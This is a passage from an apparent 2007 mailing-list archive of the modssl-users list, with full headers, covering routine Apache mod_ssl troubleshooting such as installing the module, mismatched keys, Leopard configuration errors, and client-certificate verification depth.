a="88104853:sNHT17069507" Received: from HQ-EXVS02.anteon.com ([10.170.1.143]) by HQ-EXOUT01.anteon.com with Microsoft SMTPSVC(6.0.3790.3959); Fri, 14 Dec 2007 15:25:26 -0500 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable Subject: RE: mod_ssl not for apache 2.2.4 (unix)? Date: Fri, 14 Dec 2007 15:25:03 -0500 Message-ID: In-Reply-To: <33b00e670712141210w5a373191i32b768f5967702ae@mail.gmail.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: mod_ssl not for apache 2.2.4 (unix)? Thread-Index: Acg+jWafSTU1fHe6THOlIzwx684a2gAAR3Mw References: <33b00e670712141210w5a373191i32b768f5967702ae@mail.gmail.com> From: "Fought, Richard" To: X-OriginalArrivalTime: 14 Dec 2007 20:25:26.0272 (UTC) FILETIME=[761A0000:01C83E8F] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Fought, Richard" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users As of Apache 2.x mod_ssl is included in the distribution. All you should have to do is enable the module in the configuration file. =20 Rich ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Dec 14 21:27:20 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 09F0B14D9E6; Fri, 14 Dec 2007 21:27:20 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31]) by master.modssl.org (Postfix) with ESMTP id A139B14D83F for ; Fri, 14 Dec 2007 21:27:18 +0100 (CET) Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254]) by mx1.redhat.com (8.13.8/8.13.1) with ESMTP id lBEKR6wR027934; Fri, 14 Dec 2007 15:27:06 -0500 Received: from turnip.manyfish.co.uk (IDENT:U2FsdGVkX19559gFbDKvHnXSoLwZrxKsSbJ71gVIifI@vpn-14-68.rdu.redhat.com [10.11.14.68]) by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id lBEKR6O8007552; Fri, 14 Dec 2007 15:27:06 -0500 Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.68) (envelope-from ) id 1J3H7h-0001Ha-Jx; Fri, 14 Dec 2007 20:27:05 +0000 Date: Fri, 14 Dec 2007 20:27:05 +0000 From: Joe Orton To: Chris Jordan Cc: "modssl-users@modssl.org" Subject: Re: mod_ssl not for apache 2.2.4 (unix)? Message-ID: <20071214202705.GA4882@redhat.com> Mail-Followup-To: Chris Jordan , "modssl-users@modssl.org" References: <33b00e670712141210w5a373191i32b768f5967702ae@mail.gmail.com> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Disposition: inline In-Reply-To: <33b00e670712141210w5a373191i32b768f5967702ae@mail.gmail.com> User-Agent: Mutt/1.5.17 (2007-11-01) Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom. Registered in UK and Wales under Company Registration No. 03798903 Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joe Orton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users On Fri, Dec 14, 2007 at 02:10:17PM -0600, Chris Jordan wrote: > Hi folks, > > I'm a complete newbie to compiling apache, and I'm trying to install my > first SSL certificate. All instructions I can find so far all assume that I > have mod_ssl installed already. > > I'm willing to install it, but all of the references I can find to the > latest and greatest version of mod_ssl say that it's for apache 1.3.39, but > I'm running apache 2.2.4 on a Fadora Core 6 (2.6.20-1.292.fc6) mod_ssl is part of httpd 2.x, and is included with Fedora. Run yum install mod_ssl joe ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Dec 14 21:35:11 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id A54A114D9E6; Fri, 14 Dec 2007 21:35:11 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from py-out-1112.google.com (py-out-1112.google.com [64.233.166.176]) by master.modssl.org (Postfix) with ESMTP id 6A53814D83F for ; Fri, 14 Dec 2007 21:35:08 +0100 (CET) Received: by py-out-1112.google.com with SMTP id a25so2929249pyi.11 for ; Fri, 14 Dec 2007 12:34:53 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=LfMEZEPF2bXfPpQQ42ahK4pWNZeUVWEstcWhnMPaB3s=; b=t02eeh9r0W/dNLjXFvzxa0PE6vkSeKZNy/UB7tmxO1VYzaW8b3A/MJd70JMn3a3GWpdMrOASUgE67ifhfkVjVrs4nYHQZUopyBdR7Jvsz/43Xz7Nf0By5HtI4QSSl3pWUQA+RGSr4j37UCgnHmZkElcsHj2pAoIsFL2+qUjCEIo= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=nzBR84/WSRRtN9PDNvm8RiBeSPlUK/eaxN3f+z1p8KkBAN4Z+eG18f/PcOPESS6Ut/e2AmJghAsXOWIS7Mbe2tIeFrxTutzXqtxfjtWFpRWPfu0tCwZa1A2+FrHfXPhwX11BxFETmWdZmV7ZlI0gh5lrfR+kUP6aRyseba1wTlM= Received: by 10.65.231.20 with SMTP id i20mr7997361qbr.78.1197664492910; Fri, 14 Dec 2007 12:34:52 -0800 (PST) Received: by 10.65.122.1 with HTTP; Fri, 14 Dec 2007 12:34:52 -0800 (PST) Message-ID: <33b00e670712141234t5d1af375oe0bb141fa020d3cb@mail.gmail.com> Date: Fri, 14 Dec 2007 14:34:52 -0600 From: "Chris Jordan" To: "Chris Jordan" , "modssl-users@modssl.org" Subject: Re: mod_ssl not for apache 2.2.4 (unix)? In-Reply-To: <20071214202705.GA4882@redhat.com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_2776_22004795.1197664492902" References: <33b00e670712141210w5a373191i32b768f5967702ae@mail.gmail.com> <20071214202705.GA4882@redhat.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Chris Jordan" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users ------=_Part_2776_22004795.1197664492902 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Richard & Joe, Thanks so much! Joe, thanks for the command. :o) I'll see if I can manage it from here. I appreciate you answering such a basic question for me. Really. Thanks. :o) Cheers! Chris On Dec 14, 2007 2:27 PM, Joe Orton wrote: > On Fri, Dec 14, 2007 at 02:10:17PM -0600, Chris Jordan wrote: > > Hi folks, > > > > I'm a complete newbie to compiling apache, and I'm trying to install my > > first SSL certificate. All instructions I can find so far all assume > that I > > have mod_ssl installed already. > > > > I'm willing to install it, but all of the references I can find to the > > latest and greatest version of mod_ssl say that it's for apache 1.3.39, > but > > I'm running apache 2.2.4 on a Fadora Core 6 (2.6.20-1.292.fc6) > > mod_ssl is part of httpd 2.x, and is included with Fedora. Run > > yum install mod_ssl > > joe > -- http://cjordan.us ------=_Part_2776_22004795.1197664492902 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Richard & Joe, Thanks so much!

Joe, thanks for the command. :o)

I'll see if I can manage it from here. I appreciate you answering such a basic question for me. Really. Thanks. :o)

Cheers!
Chris

On Dec 14, 2007 2:27 PM, Joe Orton <jorton@redhat.com> wrote:
On Fri, Dec 14, 2007 at 02:10:17PM -0600, Chris Jordan wrote:
> Hi folks,
>
> I'm a complete newbie to compiling apache, and I'm trying to install my
> first SSL certificate. All instructions I can find so far all assume that I
> have mod_ssl installed already.
>
> I'm willing to install it, but all of the references I can find to the
> latest and greatest version of mod_ssl say that it's for apache 1.3.39, but
> I'm running apache 2.2.4 on a Fadora Core 6 (2.6.20-1.292.fc6)

mod_ssl is part of httpd 2.x, and is included with Fedora.  Run

 yum install mod_ssl

joe



--
http://cjordan.us ------=_Part_2776_22004795.1197664492902-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Dec 14 22:00:05 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id A6DD014D9E6; Fri, 14 Dec 2007 22:00:05 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (frfcqmg011ix3r8.montpellier.mebs.ihost.com [129.35.163.230]) by master.modssl.org (Postfix) with ESMTP id 2711714D83F for ; Fri, 14 Dec 2007 22:00:04 +0100 (CET) Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com (frfcqws071ix328 [10.0.77.8]) by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11.20060308/8.12.11) with ESMTP id lBEL2NFX018743 for ; Fri, 14 Dec 2007 22:02:24 +0100 Subject: Jean-Pierre Guilloteau est absent. From: jpguilloteau@aspaway.fr To: modssl-users@modssl.org Message-ID: Date: Fri, 14 Dec 2007 22:02:26 +0100 X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(Release 7.0.2|September 26, 2006) at 12/14/2007 10:02:27 PM MIME-Version: 1.0 Content-type: text/plain; charset=ISO-8859-1 Content-transfer-encoding: quoted-printable Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jpguilloteau@aspaway.fr X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users I will be out of the office starting Mon 10/12/07 and will not return u= ntil Mon 17/12/07. Je r=E9pondrai =E0 votre message d=E8s mon retour. Vous pouvez en mon absence contacter Aspaway au 01 46 67 88 88 ou notre= support technique au 01 46 67 88 98. Cordialement.= ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Dec 17 18:36:08 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id BA58914D9EC; Mon, 17 Dec 2007 18:36:08 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from mail.annamaria.edu (mail.annamaria.edu [68.184.42.136]) by master.modssl.org (Postfix) with ESMTP id 291E114D86B for ; Mon, 17 Dec 2007 18:36:08 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by mail.annamaria.edu (Postfix) with ESMTP id 656BC6C7E8 for ; Mon, 17 Dec 2007 12:35:55 -0500 (EST) Received: from mail.annamaria.edu ([127.0.0.1]) by localhost (nospam.annamaria.edu [127.0.0.1]) (amavisd-new, port 10024) with LMTP id YWSO4Ij3wpvR for ; Mon, 17 Dec 2007 12:35:39 -0500 (EST) Received: from smtp.annamaria.edu (smtp.annamaria.edu [192.168.18.254]) by mail.annamaria.edu (Postfix) with ESMTP id BC7386C806 for ; Mon, 17 Dec 2007 12:35:17 -0500 (EST) Received: from smtp.annamaria.edu (unknown [127.0.0.1]) by smtp.annamaria.edu (Symantec Mail Security) with ESMTP id 7BAC1110080 for ; Mon, 17 Dec 2007 12:35:17 -0500 (EST) X-AuditID: c0a812fe-adfd4bb0000066ec-af-4766b35528d4 Received: from ronanianpc (unknown [192.168.18.228]) by smtp.annamaria.edu (Symantec Mail Security) with ESMTP id 2D200788064 for ; Mon, 17 Dec 2007 12:35:17 -0500 (EST) From: "Richard Onanian" To: Subject: After replacing ssl certificate, apache fails to start but gives no error Date: Mon, 17 Dec 2007 12:35:17 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Microsoft Office Outlook, Build 11.0.5510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3198 Thread-Index: AchA0zBg/w6oxP2ETNChb1rhfSbNYg== Message-Id: <20071217173517.2D200788064@smtp.annamaria.edu> X-Brightmail-Tracker: AAAAAA== Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Richard Onanian" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users I've updated my ssl public certificate and intermediate certificate according to the instructions at http://www.verisign.com/support/ssl-certificates-support/page_dev019509.html I also made sure the file permissions match. Now apache won't start, and doesn't indicate any error: [root@EmpowerWeb root]# apachectl startssl Apache/2.0.55 mod_ssl/2.0.55 (Pass Phrase Dialog) Some of your private key files are encrypted for security reasons. In order to read them you have to provide us with the pass phrases. Server webamc.annamaria.edu:443 (RSA) Enter pass phrase: [root@EmpowerWeb root]# netstat -anp | grep 443 [root@EmpowerWeb root]# Also, nothing shows up in /var/log/httpd/error_log, /var/log/httpd/access_log (of course), or /var/log/messages. If I put the old certificate back, it works: [root@EmpowerWeb root]# apachectl startssl Apache/2.0.55 mod_ssl/2.0.55 (Pass Phrase Dialog) Some of your private key files are encrypted for security reasons. In order to read them you have to provide us with the pass phrases. Server webamc.annamaria.edu:443 (RSA) Enter pass phrase: [root@EmpowerWeb root]# netstat -anp | grep 443 tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 1197/httpd [root@EmpowerWeb root]# How can I troubleshoot this? I don't have any experience with modssl, I've inherited responsibility for this system. Our certificate expires in two days. :( Thanks, Rick Onanian Network Administrator Anna Maria College ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Dec 17 21:14:38 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 6E8E714DA28; Mon, 17 Dec 2007 21:14:38 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.184]) by master.modssl.org (Postfix) with ESMTP id 21D0814D86B for ; Mon, 17 Dec 2007 21:14:37 +0100 (CET) Received: by nf-out-0910.google.com with SMTP id g16so1223404nfd.41 for ; Mon, 17 Dec 2007 12:14:26 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; bh=261nzADnnBGwiOfpnUGH3xWeOugp3ZeSzIPWQLPtaqo=; b=IIyvWy9DmdxhD2IMJ0qdhA8Q8a3qSttQZrytNG3qhTTdvOnbCM5JeJm0MZY5BGCtruBbab500c2lbU6O2v2fjGNEDkHchui/qo1hTZhgnAp4LniA4NZl8+1/stBaNP6fx3/h1ByCYPRMrcW5moHiSfKa3r/JABQRavI24npuN8s= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type; b=kRTGr2R471+tzZxOrweqa7o9Z6k8aBsQ+eG526rLgPxVMbgOLLDnClWi8BZq0IMnOHTsX7YRInK5aD2Xd15fUJl4G+uS7+TDqwRs0baFq6TmXNHKDymHfYJuRNyJEWXSG+kQO01pfCb0OaIkIfDD9dSou56Ki0hywSlIUf49cnA= Received: by 10.78.132.2 with SMTP id f2mr9073867hud.44.1197922465987; Mon, 17 Dec 2007 12:14:25 -0800 (PST) Received: by 10.78.202.13 with HTTP; Mon, 17 Dec 2007 12:14:25 -0800 (PST) Message-ID: <6afb0bb10712171214t3c6a4c26h858ea9df8c71ac15@mail.gmail.com> Date: Mon, 17 Dec 2007 15:14:25 -0500 From: "Ben assis" To: modssl-users@modssl.org Subject: Configuring ssl on apache and Leopard Mac OS 10.5.1 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_10539_4793543.1197922465975" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ben assis" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users ------=_Part_10539_4793543.1197922465975 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi, On an imac intel dual core, I recently migrated to Leopard from Tiger 10.4.10. On my Tiger client I had installed my own web server using openssl and mod_ssl with Apache 1.3 server; https was working fine. On Leopard with apache 2.2.6 and OpenSSL 0.9.7, configuration files have significantly changed; so, I cannot set my own web server to work with openssl under https protocol. Here are relevant informations about my settings and error messages : When I comment out this line in my http.conf : Include /private/etc/apache2/extra/httpd-ssl.confI get this error message in my Console and apache does'nt restart : 07-12-12 10:41:00 org.apache.httpd[48677] Syntax error on line 60 of /private/etc/apache2/extra/httpd-ssl.conf: 07-12-12 10:41:00 org.apache.httpd[48677] Invalid command 'SSLPassPhraseDialog', perhaps misspelled or defined by a module not included in the server configuration So, I comment line 60 in httpd-ssl.conflike this : #SSLPassPhraseDialog builtin After an 'apachectl restart', apache does'nt restart and I receive this new error message in my consol log: 07-12-12 10:44:04 org.apache.httpd[48720] Syntax error on line 66 of /private/etc/apache2/extra/httpd-ssl.conf: 07-12-12 10:44:04 org.apache.httpd[48720] Invalid command 'SSLSessionCache', perhaps misspelled or defined by a module not included in the server configuration and so on with the next directives... There is no other module or file which could interfere with my two conf files and I would be surprised that original conf files contain such a number of syntax errors ! Other relevant information : - In httpd-vhosts.conf I have declared 2 virtual hosts which works fine without httpd-ssl.conf. - Phpinfo() tells me that openssl 0.97l is enabled (I do not see any enabled mod_ssl module) - As my ISP blocks my port 443, I use port 8080. - If I send this command in a terminal window : bash-3.2# openssl s_client -connect localhost:8083 -state -debug - I receive : CONNECTED(00000003) SSL_connect:before/connect initialization write to 0040BD60 [00139000] (118 bytes => 118 (0x76)) 0000 - 80 74 01 03 01 00 4b 00-00 00 20 00 00 39 00 00 .t....K... ..9.. 0010 - 38 00 00 35 00 00 16 00-00 13 00 00 0a 07 00 c0 8..5............ 0020 - 00 00 33 00 00 32 00 00-2f 03 00 80 00 00 05 00 ..3..2../....... 0030 - 00 04 01 00 80 00 00 15-00 00 12 00 00 09 06 00 ................ 0040 - 40 00 00 14 00 00 11 00-00 08 00 00 06 04 00 80 @............... 0050 - 00 00 03 02 00 80 ad fc-38 5b aa e4 8a c8 16 6f ........8[.....o 0060 - 85 6e 96 be ca 41 2f ef-51 1d f1 17 a2 7b f1 d3 .n...A/.Q....{.. 0070 - 7e 9f 21 18 cc 7b ~.!..{ SSL_connect:SSLv2/v3 write client hello A read from 0040BD60 [0013F000] (7 bytes => 7 (0x7)) 0000 - 3c 21 44 4f 43 54 59 Hi, On an imac intel dual core, I recently migrated to Leopard from Tiger 10.4.10. On my Tiger client I had installed my own web server using openssl and mod_ssl with Apache 1.3 server; https was working fine. On Leopard with apache 2.2.6 and OpenSSL 0.9.7, configuration files have significantly changed; so, I cannot set my own web server to work with openssl under https protocol. Here are relevant informations about my settings and error messages : When I comment out this line in my http.conf : Include /private/etc/apache2/extra/httpd-ssl.conf
I get this error message in my Console and apache does'nt restart : 07-12-12 10:41:00 org.apache.httpd[48677] Syntax error on line 60 of /private/etc/apache2/extra/httpd-ssl.conf: 07-12-12 10:41:00 org.apache.httpd[48677] Invalid command 'SSLPassPhraseDialog', perhaps misspelled or defined by a module not included in the server configuration
So, I comment line 60 in httpd-ssl.conf like this : #SSLPassPhraseDialog builtin After an 'apachectl restart', apache does'nt restart and I receive this new error message in my consol log: 07-12-12 10:44:04 org.apache.httpd[48720] Syntax error on line 66 of /private/etc/apache2/extra/httpd-ssl.conf: 07-12-12 10:44:04 org.apache.httpd[48720] Invalid command 'SSLSessionCache', perhaps misspelled or defined by a module not included in the server configuration
and so on with the next directives... There is no other module or file which could interfere with my two conf files and I would be surprised that original conf files contain such a number of syntax errors !
Other relevant information :

- In httpd-vhosts.conf I have declared 2 virtual hosts which works fine without httpd-ssl.conf.
- Phpinfo() tells me that openssl 0.97l is enabled (I do not see any enabled mod_ssl module)
- As my ISP blocks my port 443, I use port 8080.
- If I send this command in a terminal window :

 
bash-3.2# openssl s_client -connect localhost:8083 -state -debug
- I receive :

CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 0040BD60 [00139000] (118 bytes => 118 (0x76))
0000 - 80 74 01 03 01 00 4b 00-00 00 20 00 00 39 00 00   .t....K... ..9..
0010 - 38 00 00 35 00 00 16 00-00 13 00 00 0a 07 00 c0   8..5............
0020 - 00 00 33 00 00 32 00 00-2f 03 00 80 00 00 05 00   ..3..2../.......
0030 - 00 04 01 00 80 00 00 15-00 00 12 00 00 09 06 00   ................
0040 - 40 00 00 14 00 00 11 00-00 08 00 00 06 04 00 80   @...............
0050 - 00 00 03 02 00 80 ad fc-38 5b aa e4 8a c8 16 6f   ........8[.....o
0060 - 85 6e 96 be ca 41 2f ef-51 1d f1 17 a2 7b f1 d3   .n...A/.Q....{..
0070 - 7e 9f 21 18 cc 7b                                 ~.!..{
SSL_connect:SSLv2/v3 write client hello A
read from 0040BD60 [0013F000] (7 bytes => 7 (0x7))
0000 - 3c 21 44 4f 43 54 59                              <!DOCTY
SSL_connect:error in SSLv2/v3 read server hello A
1721:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol:s23_clnt.c:601:

- Following are my includes conf files : # Virtual hosts Include /private/etc/apache2/extra/httpd-vhosts.conf
# Real-time info on requests and configuration #Include /private/etc/apache2/extra/httpd-info.conf # Local access to the Apache HTTP Server Manual Include /private/etc/apache2/extra/httpd-manual.conf # Distributed authoring and versioning (WebDAV) #Include /private/etc/apache2/extra/httpd-dav.conf # Various default settings #Include /private/etc/apache2/extra/httpd-default.conf # Secure (SSL/TLS) connections Include /private/etc/apache2/extra/httpd-ssl.conf # AddType application/x-httpd-php .php AddType application/x-httpd-php-source .phps DirectoryIndex index.html index.php #Include /private/etc/apache2/other/*.conf Any idea ? Thanks for helping me
------=_Part_10539_4793543.1197922465975-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Dec 17 21:22:08 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 27E4E14DA28; Mon, 17 Dec 2007 21:22:08 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from mail.annamaria.edu (mail.annamaria.edu [68.184.42.136]) by master.modssl.org (Postfix) with ESMTP id C487814D86B for ; Mon, 17 Dec 2007 21:22:07 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by mail.annamaria.edu (Postfix) with ESMTP id DEFE56C3A4 for ; Mon, 17 Dec 2007 15:21:55 -0500 (EST) Received: from mail.annamaria.edu ([127.0.0.1]) by localhost (nospam.annamaria.edu [127.0.0.1]) (amavisd-new, port 10024) with LMTP id hi7OOWC+YiLY for ; Mon, 17 Dec 2007 15:21:55 -0500 (EST) Received: from smtp.annamaria.edu (smtp.annamaria.edu [192.168.18.254]) by mail.annamaria.edu (Postfix) with ESMTP id 41D886C98D for ; Mon, 17 Dec 2007 15:21:55 -0500 (EST) Received: from smtp.annamaria.edu (unknown [127.0.0.1]) by smtp.annamaria.edu (Symantec Mail Security) with ESMTP id EA2A611007C for ; Mon, 17 Dec 2007 15:21:54 -0500 (EST) X-AuditID: c0a812fe-ab7d0bb0000066ec-ca-4766da621b59 Received: from ronanianpc (unknown [192.168.18.228]) by smtp.annamaria.edu (Symantec Mail Security) with ESMTP id A34FF788064 for ; Mon, 17 Dec 2007 15:21:54 -0500 (EST) From: "Richard Onanian" To: Subject: Re: After replacing ssl certificate, apache fails to start but gives no error Date: Mon, 17 Dec 2007 15:21:54 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Microsoft Office Outlook, Build 11.0.5510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3198 In-Reply-To: <20071217173517.2D200788064@smtp.annamaria.edu> Thread-Index: AchA0zBg/w6oxP2ETNChb1rhfSbNYgAFzb5g Message-Id: <20071217202154.A34FF788064@smtp.annamaria.edu> X-Brightmail-Tracker: AAAAAA== Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Richard Onanian" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users I wrote: > I've updated my ssl public certificate and intermediate certificate > according to the instructions [...] > I also made sure the file permissions match. Now apache won't start, and > doesn't indicate any error: > Also, nothing shows up in /var/log/httpd/error_log, > /var/log/httpd/access_log (of course), or /var/log/messages. Okay, I figured it out. I tried breaking things until I found the same symptom. I found that when I used the wrong private key, it had the same symptom. Sure enough, that was the problem. The CSR I used to get the certificate signed by Verisign was for a different key. I now have a significantly better understanding of how the whole process works. Why doesn't modssl provide any error message or log entry? Is it insecure to use an old key pair? What's the appropriate thing to do -- create a new key pair (and a new CSR) each time you renew your signed certificate, or just re-use the old key pair and get a new signed certificate? Thanks, Rick Onanian Network Administrator Anna Maria College ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Dec 18 12:18:16 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 805EF14DA34; Tue, 18 Dec 2007 12:18:16 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from f75.mail.ru (f75.mail.ru [194.67.57.175]) by master.modssl.org (Postfix) with ESMTP id BE3FC14D847 for ; Tue, 18 Dec 2007 12:18:15 +0100 (CET) Received: from mail by f75.mail.ru with local id 1J4aSZ-0009Ne-00 for modssl-users@modssl.org; Tue, 18 Dec 2007 14:18:03 +0300 Received: from [193.233.48.103] by win.mail.ru with HTTP; Tue, 18 Dec 2007 14:18:03 +0300 From: Vladimir A. Pavlov To: modssl-users@modssl.org Subject: =?koi8-r?Q?Does_=22SSLVerifyDepth_1=22_actually_allow_self-signed_client_certificates=3F?= Mime-Version: 1.0 X-Mailer: mPOP Web-Mail 2.19 X-Originating-IP: [193.233.48.103] Date: Tue, 18 Dec 2007 14:18:03 +0300 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Message-Id: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Vladimir A. Pavlov X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Hi! I try to use mod_ssl to protect a part of my site from all users except a few persons having client certificates signed by my _self-created_ CA key. I created my ca.crt and signed some csr files with it, and have no problems accessing the site with those. I use the following httpd.conf options: > ... > > SSLVerifyClient require > SSLVerifyDepth 1 > SSLCACertificateFile "/path/to/my/ca.crt" > > ... But apache docs say: "... the default depth of 1 means the client certificate can be self-signed or has to be signed by a CA which is directly known to the server". That means that _everybody_ can access the private part of my site by just creating a self-signed certificate and using it to authenticate himself/herself. Then, I wished to check whether it's so bad as the docs say. I created a self-signed certificate with the following commands and tried to authorize using the resulting clt.p12 > openssl genrsa -out clt.pem 1024 > openssl req -new -x509 -key clt.pem -out clt.crt -days 100 > openssl pkcs12 -export -inkey clt.pem -in clt.crt -out clt.p12 and I got error "The presented certificate has an unknown Certificate Authority." in my browser (opera 9.22). The server logs contained the following: > [error] Certificate Verification: Error (18): self signed certificate > [error] Re-negotiation handshake failed: Not accepted by client!? So, I see the docs don't mean what I think they mean... or I'm wrong somewhere (for example, in creating a self-signed certificate or in understanding what "self-signed certificate" means in the context of apache docs). So, here are the questions: 1. Are the docs correct? 2. Do I correctly understand that in any case (with any value of SSLVerifyDepth) everybody will be able to access the private part of my site (since everybody can create a self-signed certificate)? 3. If so, why cannot I use self-signed certificate to access my site? 4. Is there a way to gain access to the users with a certificate signed by my ca.crt only? I use Windows XP, Apache/2.2.6, mod_ssl/2.2.6, OpenSSL/0.9.8e, PHP/5.2.3. Help me, please... ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Dec 18 15:40:09 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id A07EE14D9EC; Tue, 18 Dec 2007 15:40:09 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from fk-out-0910.google.com (fk-out-0910.google.com [209.85.128.190]) by master.modssl.org (Postfix) with ESMTP id 2FF9714D847 for ; Tue, 18 Dec 2007 15:40:09 +0100 (CET) Received: by fk-out-0910.google.com with SMTP id z22so2384916fkz.1 for ; Tue, 18 Dec 2007 06:39:57 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding; bh=QA0QYV+eoCGE/emBC7PxL0cVRAJ92e6f2+yjRnB+wkA=; 